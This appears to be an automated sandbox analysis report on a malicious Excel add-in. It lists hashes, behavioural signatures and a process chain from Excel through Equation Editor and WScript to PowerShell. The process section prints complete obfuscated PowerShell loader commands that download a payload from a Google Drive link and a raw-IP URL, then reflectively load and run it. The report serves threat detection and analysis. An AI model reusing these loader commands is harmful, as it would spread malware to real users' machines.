Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23-10-2024 13:30
Static task
static1
Behavioral task
behavioral1
Sample
2dad4b0d2557af1cadd3c7cb8e06f37c767c6565d2ec598a116a3063b92b0420.xlam
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2dad4b0d2557af1cadd3c7cb8e06f37c767c6565d2ec598a116a3063b92b0420.xlam
Resource
win10v2004-20241007-en
General
-
Target
2dad4b0d2557af1cadd3c7cb8e06f37c767c6565d2ec598a116a3063b92b0420.xlam
-
Size
596KB
-
MD5
6073b84bbdc3b910df55b8b42a16ab65
-
SHA1
28c95e7d8f2fa7dee552bcc190b7ec6aaa9ea9f3
-
SHA256
2dad4b0d2557af1cadd3c7cb8e06f37c767c6565d2ec598a116a3063b92b0420
-
SHA512
1392956610ded25dc8e5ca50c5a15218e3a2ecdc12314ae7bf0313a47dd35c2ead7aba74fc7381542c2e107b547bbef23f9be1ea8ff653b3da1e1f951485a50d
-
SSDEEP
12288:JJRTchjxyfDF5NYzNewgU8mLQobusNRO+IXbpwOjMbR6I6EfjOvCxicvG:JJp4j2FYReBm9bpNROtgt6zErkC7vG
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 1812 EQNEDT32.EXE 6 2712 powershell.exe 8 2712 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2900 powershell.exe 2712 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 6 drive.google.com 5 drive.google.com -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 1812 EQNEDT32.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2508 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2900 powershell.exe 2712 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2900 powershell.exe Token: SeDebugPrivilege 2712 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2508 EXCEL.EXE 2508 EXCEL.EXE 2508 EXCEL.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1812 wrote to memory of 2724 1812 EQNEDT32.EXE 32 PID 1812 wrote to memory of 2724 1812 EQNEDT32.EXE 32 PID 1812 wrote to memory of 2724 1812 EQNEDT32.EXE 32 PID 1812 wrote to memory of 2724 1812 EQNEDT32.EXE 32 PID 2724 wrote to memory of 2900 2724 WScript.exe 33 PID 2724 wrote to memory of 2900 2724 WScript.exe 33 PID 2724 wrote to memory of 2900 2724 WScript.exe 33 PID 2724 wrote to memory of 2900 2724 WScript.exe 33 PID 2900 wrote to memory of 2712 2900 powershell.exe 35 PID 2900 wrote to memory of 2712 2900 powershell.exe 35 PID 2900 wrote to memory of 2712 2900 powershell.exe 35 PID 2900 wrote to memory of 2712 2900 powershell.exe 35
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\2dad4b0d2557af1cadd3c7cb8e06f37c767c6565d2ec598a116a3063b92b0420.xlam1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2508
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\medicallaboratorydatinglover.vbs"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWVYKCAoJ3FPJysnNGltYWdlVXJsID0gaDFTaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgaDFTO3FPNHcnKydlYkNsaWVuJysndCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDJysnbCcrJ2llbnQ7cU80aW1hZ2VCeXRlcyA9IHFPNHdlYkNsaWVudC4nKydEb3dubG9hZERhdGEocU80aW1hJysnZ2VVcmwpO3EnKydPNGltYWdlVGV4dCA9IFtTJysneXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHFPJysnNGltYWdlQnl0ZXMpO3FPJysnNHN0YXJ0RmxhZyA9IGgxUzw8QkFTRTY0X1NUQVJUPj5oMVM7cU80ZW5kRmxhZyA9IGgxUzw8QkFTRTY0X0VORD4+aDFTO3FPNHN0YXJ0SW5kZXggPSBxTzRpbWFnZVRlJysneHQuSW5kZXhPZihxTzRzdGFydEZsYWcpO3FPNGVuZEluZGV4ID0gcU80aW1hZ2VUZXh0LkluZGV4T2YocU80ZW5kRmxhZyk7cU80cycrJ3RhcnRJbmRleCAtZ2UgMCAtYW5kIHFPNGVuZEluZGV4IC1ndCBxTzRzdGFydEluZCcrJ2V4O3FPNHN0YXJ0SW5kZXggKz0gcU80c3RhcnRGbGEnKydnLkxlbmd0aDtxTzRiYXNlNjRMZW5ndGggPSBxTzRlbmRJbmRleCAtIHFPNHN0YXJ0SW5kZXg7cU80YmFzZTY0Q29tbWFuZCA9IHFPNGltYWdlVGV4dC5TdWJzdCcrJ3JpbmcocU80c3RhcnRJbmRleCwgcU80YmFzZTY0TGVuZ3RoJysnKTtxTzRiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChxTzRiYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgS3lJIEZvckVhY2gtT2JqZWN0IHsgcU80XyB9KScrJ1stMS4uLShxTzRiYXNlNjRDb21tYW5kLkxlbmd0aCldO3FPNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZScrJ20uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocU80YmFzZTY0UmV2ZXJzZWQpO3FPNGxvYWRlZEEnKydzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChxTzRjb21tYW5kQnl0ZXMpO3FPNHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaDFTVkFJaDFTKTtxTzR2YWlNZXRob2QuSW52b2tlKHFPNG51bGwsIEAoaDFTdHh0LjQ0NDZlc2FiYmJiYmInKydiYmJiZXdtYWRhbS80MzEuODcxLjY0Ljg5MS8vOnB0dGhoMVMsIGgxU2Rlc2F0aXZhZG9oMVMsIGgxU2Rlc2F0aXZhJysnZG9oMVMsIGgxU2Rlc2F0aXZhZG9oMVMsIGgxJysnU0FkZEluUHJvY2VzczMyaDFTLCBoMVMnKydkZXNhdGl2YWRvaDFTLCBoMVNkZXNhdGl2YWRvaDFTLGgxU2Rlc2F0aXZhZG9oMVMsaDFTZGVzYXRpdmFkb2gxUyxoMVNkZXNhdGknKyd2YWRvaDFTLGgxU2Rlc2F0aXZhZG9oMVMsaDFTZGVzYXRpdmFkb2gxUyxoMVMxaDFTLGgxU2Rlc2F0aXZhZG9oMVMpKTsnKS5yZVBsQWNFKChbQ2hhUl0xMTMrW0NoYVJdNzkrW0NoYVJdNTIpLCckJykucmVQbEFjRSgoW0NoYVJdNzUrW0NoYVJdMTIxK1tDaGFSXTczKSxbc3RyaU5nXVtDaGFSXTEyNCkucmVQbEFjRSgoW0NoYVJdMTA0K1tDaGFSXTQ5K1tDaGFSXTgzKSxbc3RyaU5nXVtDaGFSXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "IeX( ('qO'+'4imageUrl = h1Shttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur h1S;qO4w'+'ebClien'+'t = New-Object System.Net.WebC'+'l'+'ient;qO4imageBytes = qO4webClient.'+'DownloadData(qO4ima'+'geUrl);q'+'O4imageText = [S'+'ystem.Text.Encoding]::UTF8.GetString(qO'+'4imageBytes);qO'+'4startFlag = h1S<<BASE64_START>>h1S;qO4endFlag = h1S<<BASE64_END>>h1S;qO4startIndex = qO4imageTe'+'xt.IndexOf(qO4startFlag);qO4endIndex = qO4imageText.IndexOf(qO4endFlag);qO4s'+'tartIndex -ge 0 -and qO4endIndex -gt qO4startInd'+'ex;qO4startIndex += qO4startFla'+'g.Length;qO4base64Length = qO4endIndex - qO4startIndex;qO4base64Command = qO4imageText.Subst'+'ring(qO4startIndex, qO4base64Length'+');qO4base64Reversed = -join (qO4base64Command.To'+'CharArray() KyI ForEach-Object { qO4_ })'+'[-1..-(qO4base64Command.Length)];qO4commandBytes = [Syste'+'m.Convert]::FromBase64String(qO4base64Reversed);qO4loadedA'+'ssembly = [System.Reflection.Assembly]::Load(qO4commandBytes);qO4vaiMethod = [dnlib.IO.Home].GetMethod(h1SVAIh1S);qO4vaiMethod.Invoke(qO4null, @(h1Stxt.4446esabbbbbb'+'bbbbewmadam/431.871.64.891//:ptthh1S, h1Sdesativadoh1S, h1Sdesativa'+'doh1S, h1Sdesativadoh1S, h1'+'SAddInProcess32h1S, h1S'+'desativadoh1S, h1Sdesativadoh1S,h1Sdesativadoh1S,h1Sdesativadoh1S,h1Sdesati'+'vadoh1S,h1Sdesativadoh1S,h1Sdesativadoh1S,h1S1h1S,h1Sdesativadoh1S));').rePlAcE(([ChaR]113+[ChaR]79+[ChaR]52),'$').rePlAcE(([ChaR]75+[ChaR]121+[ChaR]73),[striNg][ChaR]124).rePlAcE(([ChaR]104+[ChaR]49+[ChaR]83),[striNg][ChaR]39) )"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD51a55947f9e52ea2b60d984e5d3569e44
SHA18aeeeb5c9e0c1a402de12381e6a95040fc713ebb
SHA256b7a925df4629e9373c3b4a27aa236ec892addcce15c4c45cbd60f2ef3c214c48
SHA5127c8cfc5ad0fe64877805b9920e6e7e6c10e6a0e01b4680efec0abe14c8aa0c15ca18ab7fd35558583c47710607c2c07ec24bbe3f734a1588a0f0b75fc955914d
-
Filesize
136KB
MD5d62f25ced5ad03573d59a9d6fe47faef
SHA1c3252d74ed8960f8372b09e170c3e679a085429b
SHA25680bd9d4929c8a9f3909a7a8f143ca4f5d7e14efd477ae19e638c1d4d9e753bdc
SHA512a8e676bcbd422e27bbfe87a992b42050304282c25cccc83a8950896d2b465483752d1eb7d269d4bb2b1b08e946bc09cbde150c5735e5b5f14734cf0052cf7bd6